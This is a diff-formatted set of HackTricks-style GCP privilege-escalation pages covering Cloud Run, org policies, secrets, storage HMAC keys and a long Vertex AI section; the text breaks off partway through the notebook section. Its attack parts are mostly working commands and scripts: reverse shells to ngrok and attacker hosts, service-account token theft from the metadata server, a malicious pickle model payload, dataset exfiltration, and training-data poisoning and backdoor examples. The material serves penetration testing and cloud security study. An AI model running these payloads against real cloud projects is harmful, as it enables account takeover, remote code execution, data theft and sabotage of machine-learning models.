gcloud resource-manager org-policies describe <org-policy> [--folder <id> | --organization <id> | --project <id>]
@@ -16,6 +19,8 @@ gcloud resource-manager org-policies describe <org-policy> [--folder <id> | --or
gcloud resource-manager org-policies disable-enforce <org-policy> [--folder <id> | --organization <id> | --project <id>]
```
</details>
A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
### `orgpolicy.policy.set`, `iam.serviceAccounts.actAs`
@@ -24,6 +29,9 @@ uusally it's not possible to attach a service account from a different project t
It's possible to verify if this constraint is enforced by running the following command:
<details>
<summary>Verify cross-project service account constraint</summary>
```bash
gcloud resource-manager org-policies describe \
constraints/iam.disableCrossProjectServiceAccountUsage \
@@ -35,16 +43,23 @@ booleanPolicy:
constraint: constraints/iam.disableCrossProjectServiceAccountUsage
```
</details>
This prevents an attacker from abusing the permission **`iam.serviceAccounts.actAs`** to impersonate a service account from another project without needing further infra permissions (to start a new VM, for example), which could lead to privilege escalation.
However, an attacker with the permission **`orgpolicy.policy.set`** can bypass this restriction by disabling the constraint **`iam.disableCrossProjectServiceAccountUsage`**. This allows the attacker to attach a service account from another project to a resource in his own project, effectively escalating his privileges.
<details>
<summary>Disable cross-project service account constraint</summary>
```bash
gcloud resource-manager org-policies disable-enforce \
iam.disableCrossProjectServiceAccountUsage \
--project=<project-id>
```
</details>
## References
- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)

View File

@@ -22,6 +22,9 @@ Note that when using `gcloud run deploy` instead of just creating the service **
Like the previous one but updating a service:
<details>
<summary>Deploy Cloud Run service with reverse shell</summary>
```bash
# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
@@ -38,6 +41,8 @@ gcloud run deploy hacked \
# If you don't have permissions to use "--allow-unauthenticated", don't use it
```
</details>
### `run.services.setIamPolicy`
Give yourself the previous permissions over Cloud Run.
@@ -46,6 +51,9 @@ Give yourself previous permissions over cloud Run.
Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh).
<details>
<summary>Create Cloud Run job with reverse shell</summary>
```bash
gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
@@ -56,10 +64,15 @@ gcloud beta run jobs create jab-cloudrun-3326 \
```
</details>
### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)
Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:
<details>
<summary>Update Cloud Run job and execute with reverse shell</summary>
```bash
gcloud beta run jobs update hacked \
--image=ubuntu:latest \
@@ -70,6 +83,8 @@ gcloud beta run jobs update hacked \
--execute-now
```
</details>
### `run.jobs.setIamPolicy`
Give yourself the previous permissions over Cloud Jobs.
@@ -78,10 +93,15 @@ Give yourself the previous permissions over Cloud Jobs.
Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:
<details>
<summary>Execute Cloud Run job with environment variable exploitation</summary>
```bash
gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
```
</details>
## References
- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

View File

@@ -14,11 +14,15 @@ For more information about secretmanager:
This gives you access to read the secrets from the secret manager, and maybe this could help to escalate privileges (depending on which information is stored inside the secret):
<details><summary>Get clear-text secret version</summary>
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
</details>
As this is also a post exploitation technique it can be found in:
{{#ref}}
@@ -29,12 +33,16 @@ As this is also a post exploitation technique it can be found in:
This gives you the ability to grant yourself access to read the secrets from the secret manager, for example using:
<details><summary>Add IAM policy binding to secret</summary>
```bash
gcloud secrets add-iam-policy-binding <secret-name> \
--member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
--role="roles/secretmanager.secretAccessor"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,18 +18,26 @@ gcp-apikeys-privesc.md
An undocumented API was found that can be used to **create API keys:**
<details><summary>Create API key using undocumented API</summary>
```bash
curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
```
</details>
### `serviceusage.apiKeys.list`
Another undocumented API was found for listing API keys that have already been created (the API keys appear in the response):
<details><summary>List API keys using undocumented API</summary>
```bash
curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
```
</details>
### **`serviceusage.services.enable`** , **`serviceusage.services.use`**
With these permissions an attacker can enable and use new services in the project. This could allow an **attacker to enable services like admin or cloudidentity** to try to access Workspace information, or other services to access interesting data.
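A minimal sketch (the chosen APIs are just examples; what you can do afterwards depends on the permissions you already hold):

<details><summary>Enable additional APIs in the project</summary>

```bash
# Enable APIs that may expose Workspace / identity information
gcloud services enable admin.googleapis.com cloudidentity.googleapis.com --project <project-id>

# Confirm what is now enabled
gcloud services list --enabled --project <project-id>
```

</details>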

View File

@@ -14,10 +14,14 @@ For more information about Source Repositories check:
With this permission it's possible to download the repository locally:
<details><summary>Clone source repository</summary>
```bash
gcloud source repos clone <repo-name> --project=<project-uniq-name>
```
</details>
### `source.repos.update`
A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone <repo>`**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
@@ -47,10 +51,14 @@ It's possible to **add ssh keys to the Source Repository project** in the web co
Once your ssh key is set, you can access a repo with:
<details><summary>Clone repository using SSH</summary>
```bash
git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
```
</details>
And then use **`git`** commands as per usual.
### Manual Credentials
@@ -73,6 +81,8 @@ Executing the script you can then use git clone, push... and it will work.
With this permission it's possible to disable the Source Repositories default protection against uploading code containing private keys:
<details><summary>Disable pushblock and modify pub/sub configuration</summary>
```bash
gcloud source project-configs update --disable-pushblock
```
@@ -84,6 +94,8 @@ gcloud source project-configs update --remove-topic=REMOVE_TOPIC
gcloud source project-configs update --remove-topic=UPDATE_TOPIC
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -33,6 +33,8 @@ For an example on how to modify permissions with this permission check this page
Cloud Storage's "interoperability" feature, designed for **cross-cloud interactions** like with AWS S3, involves the **creation of HMAC keys for Service Accounts and users**. An attacker can exploit this by **generating an HMAC key for a Service Account with elevated privileges**, thus **escalating privileges within Cloud Storage**. While user-associated HMAC keys are only retrievable via the web console, both the access and secret keys remain **perpetually accessible**, providing a potential backup way of accessing storage. Conversely, Service Account-linked HMAC keys are API-accessible, but their access and secret keys are not retrievable post-creation, adding a layer of complexity for continuous access.
<details><summary>Create and use HMAC key for privilege escalation</summary>
```bash
# Create key
gsutil hmac create <sa-email> # You might need to execute this inside a VM instance
@@ -63,6 +65,8 @@ gsutil ls gs://[BUCKET_NAME]
gcloud config set pass_credentials_to_gsutil true
```
</details>
Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
### `storage.objects.create`, `storage.objects.delete` = Storage Write permissions

View File

@@ -0,0 +1,755 @@
# GCP - Vertex AI Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Vertex AI
For more information about Vertex AI check:
{{#ref}}
../gcp-services/gcp-vertex-ai-enum.md
{{#endref}}
### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`
With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can **execute arbitrary code with elevated privileges**.
This works by creating a custom training job that runs attacker-controlled code (either a custom container or Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account's OAuth access token.
**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl http://attacker.com" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# On your attacker machine, start a listener first:
# nc -lvnp 4444
# Once connected, you can extract the token with:
# curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```
</details>
<details>
<summary>Alternative: Extract token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
```
</details>
> [!CAUTION]
> The custom job will run with the specified service account's permissions. Ensure you have `iam.serviceAccounts.actAs` permission on the target service account.
### `aiplatform.models.upload`, `aiplatform.models.get`
This technique achieves privilege escalation by uploading a model to Vertex AI and then leveraging that model to execute code with elevated privileges through an endpoint deployment or a batch prediction job.
> [!NOTE]
> To perform this attack you need a world-readable GCS bucket (or the ability to create a new one) to host the model artifacts.
<details>
<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle
class MaliciousModel:
def __reduce__(self):
import subprocess
cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
return (subprocess.Popen, (['/bin/bash', '-c', cmd],))
# Save malicious model
with open('model.pkl', 'wb') as f:
pickle.dump(MaliciousModel(), f)
EOF
python3 create_malicious_model.py
# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/malicious-model/ \
--display-name=malicious-sklearn \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```
</details>
<details>
<summary>Upload model with container reverse shell</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a dummy model artifact that must exist in a storage bucket so the container can be served later
python3 -c '
import pickle
pickle.dump({}, open("model.pkl", "wb"))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
> [!DANGER]
> After uploading the malicious model an attacker can wait for someone to use it, or launch the model himself via an endpoint deployment or a batch prediction job.
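To notice when the planted model actually gets used, you can periodically check whether it has been deployed anywhere (a sketch; the `deployedModels` field comes from the Model/Endpoint resources and may be empty until a deployment happens):

<details>

<summary>Check if the uploaded model got deployed</summary>

```bash
# Check whether the uploaded model is referenced by any deployment
gcloud ai models describe <model-id> --region=<region> --format="value(deployedModels)"

# Or enumerate endpoints and inspect their deployed models
gcloud ai endpoints list --region=<region>
gcloud ai endpoints describe <endpoint-id> --region=<region> --format="value(deployedModels)"
```

</details>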
#### `iam.serviceAccounts.actAs`, ( `aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get` ) or ( `aiplatform.endpoints.setIamPolicy` )
If you have permissions to create and deploy models to endpoints, or modify endpoint IAM policies, you can leverage uploaded malicious models in the project to achieve privilege escalation. To trigger one of the previously uploaded malicious models via an endpoint all you need to do is:
<details>
<summary>Deploy malicious model to endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
--region=<region> \
--display-name=revshell-endpoint
# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
--region=<region> \
--model=<model-id> \
--display-name=revshell-deployment \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
--machine-type=n1-standard-2 \
--min-replica-count=1
```
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
If you have permissions to create **batch prediction jobs** and run them with a service account, you can access the metadata service. The malicious code executes from a **custom prediction container** or **malicious model** during the batch prediction process.
**Note**: Batch prediction jobs can only be created via REST API or Python SDK (no gcloud CLI support).
> [!NOTE]
> This attack requires first uploading a malicious model (see `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
<details>
<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
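To confirm the batch job was actually scheduled (and therefore that the malicious container ran), you can poll its state; a minimal sketch reusing the same `PROJECT`/`REGION` variables:

<details>

<summary>Check batch prediction job state</summary>

```bash
# List batch prediction jobs and check their state (e.g. JOB_STATE_PENDING, JOB_STATE_RUNNING, JOB_STATE_SUCCEEDED)
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs" \
  | grep -E '"(name|displayName|state)"'
```

</details>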
### `aiplatform.models.export`
If you have the **models.export** permission, you can export model artifacts to a GCS bucket you control, potentially accessing sensitive training data or model files.
> [!NOTE]
> To perform this attack you need a world-readable and writable GCS bucket (or the ability to create a new one) to receive the exported model artifacts.
<details>
<summary>Export model artifacts to GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
-d '{
"outputConfig": {
"exportFormatId": "custom-trained",
"artifactDestination": {
"outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
}
}
}'
# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```
</details>
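The export call returns a long-running operation, so before downloading anything you can check whether it has finished (the operation ID comes from the response of the previous request):

<details>

<summary>Check the export operation status</summary>

```bash
# Poll the long-running operation until it reports done: true
gcloud ai operations describe <operation-id> --region=<region>
```

</details>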
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Create **ML pipeline jobs** that execute multiple steps with arbitrary containers and achieve privilege escalation through reverse shell access.
Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.
> [!NOTE]
> You need a world-writable GCS bucket to use as the pipeline root.
<details>
<summary>Install Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```
</details>
<details>
<summary>Create pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import subprocess
PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<sa-email>"
# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
"schemaVersion": "2.1.0",
"sdkVersion": "kfp-2.0.0",
"pipelineInfo": {
"name": "data-processing-pipeline"
},
"root": {
"dag": {
"tasks": {
"process-task": {
"taskInfo": {
"name": "process-task"
},
"componentRef": {
"name": "comp-process"
}
}
}
}
},
"components": {
"comp-process": {
"executorLabel": "exec-process"
}
},
"deploymentSpec": {
"executors": {
"exec-process": {
"container": {
"image": "python:3.11-slim",
"command": ["python3"],
"args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
}
}
}
}
}
# Create the request body
request_body = {
"displayName": "ml-training-pipeline",
"runtimeConfig": {
"gcsOutputDirectory": "gs://gstorage-name/folder"
},
"pipelineSpec": pipeline_spec,
"serviceAccount": TARGET_SA
}
# Get access token
token_result = subprocess.run(
["gcloud", "auth", "print-access-token"],
capture_output=True,
text=True,
check=True
)
access_token = token_result.stdout.strip()
# Submit via REST API
import requests
url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
"Authorization": f"Bearer {access_token}",
"Content-Type": "application/json"
}
print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]:
result = response.json()
print(f"✓ Pipeline job submitted successfully!")
print(f" Job name: {result.get('name', 'N/A')}")
print(f" Check your reverse shell listener for connection")
else:
print(f"✗ Error: {response.status_code}")
print(f" {response.text}")
```
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.
Hyperparameter tuning jobs allow you to run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or exfiltration command, and associating it with a privileged service account, you can achieve privilege escalation.
**Impact**: Full privilege escalation to the target service account's permissions.
<details>
<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
</details>
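Once submitted, you can verify that the trial containers are actually being scheduled (and debug configuration errors) by inspecting the job:

<details>

<summary>Monitor the hyperparameter tuning job</summary>

```bash
# List HP tuning jobs and inspect the one you created (state, trials, applied container spec)
gcloud ai hp-tuning-jobs list --region=<region>
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>
```

</details>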
### `aiplatform.datasets.export`
Export **datasets** to exfiltrate training data that may contain sensitive information.
**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
Datasets often contain the original training data which may include PII, confidential business data, or other sensitive information that was used to train production models.
<details>
<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
-d '{
"exportConfig": {
"gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
}
}'
# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete
# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
# The exported data may contain:
# - References to training images/files in GCS buckets
# - Dataset annotations and labels
# - PII (Personally Identifiable Information)
# - Sensitive business data
# - Internal documents or communications
# - Credentials or API keys in text data
```
</details>
### `aiplatform.datasets.import`
Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.
**Note**: Dataset operations require REST API or Python SDK (no gcloud CLI support for datasets).
By importing crafted data into a dataset used for training ML models, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison training data to degrade model performance
- Inject data to cause models to leak information
- Manipulate model behavior for specific inputs
This attack is particularly effective when targeting datasets used for:
- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)
<details>
<summary>Import poisoned data into dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
```
</details>
**Attack Scenarios:**
<details>
<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```
</details>
<details>
<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```
</details>
<details>
<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```
</details>
<details>
<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```
</details>
> [!DANGER]
> Data poisoning attacks can have severe consequences:
> - **Security systems**: Bypass facial recognition or anomaly detection
> - **Fraud detection**: Train models to ignore specific fraud patterns
> - **Content moderation**: Cause harmful content to be classified as safe
> - **Medical AI**: Misclassify critical health conditions
> - **Autonomous systems**: Manipulate object detection for safety-critical decisions
**Impact**:
- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models trained on poisoned data will inherit the backdoor)
### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`
> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of Vertex AI Workbench Managed Notebooks deprecation. The modern approach is using **Vertex AI Workbench Executor** which runs notebooks through `aiplatform.customJobs.create` (already documented above).
> The Vertex AI Workbench Executor allows scheduling notebook runs that execute on Vertex AI custom training infrastructure with a specified service account. This is essentially a convenience wrapper around `customJobs.create`.
> **For privilege escalation via notebooks**: Use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
**The following technique is provided for historical context only and is not recommended for use in new assessments.**
Create **notebook execution jobs** that run Jupyter notebooks with arbitrary code.
Notebook jobs are ideal for interactive-style code execution with a service account, as they support Python code cells and shell commands.
<details>
<summary>Create malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "metadata": {},
      "outputs": [],
      "source": [
        "import subprocess\n",
